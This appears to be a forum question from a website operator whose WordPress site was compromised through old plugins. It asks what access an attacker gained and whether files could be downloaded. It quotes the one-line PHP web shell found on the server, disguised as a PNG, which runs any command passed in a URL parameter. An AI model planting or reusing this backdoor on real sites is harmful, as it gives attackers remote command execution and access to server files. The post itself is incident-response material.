Backdoor exploit – could they have downloaded files from server?

Due to a customer running old WordPress plugins, a php file with the following code was added to their website:

‰PNG <?php $  str = $  _GET['cmd']; system($  str); ?> 

The above file was detected by Wordfence as "Backdoor:PNG/ImageMagic.7484 Executable code masquerading as an image."

This (or another exploit) appears to have give the intruder the ability to at least upload files as text files containing the words "Hacked by …" were added to various places on the server.

Using this exploit, what kind of access would be allowed onto the server besides the ability to upload files? Could they have also downloaded files from anywhere on the server?

We are running a cPanel environment on Apache, MySQL and PHP.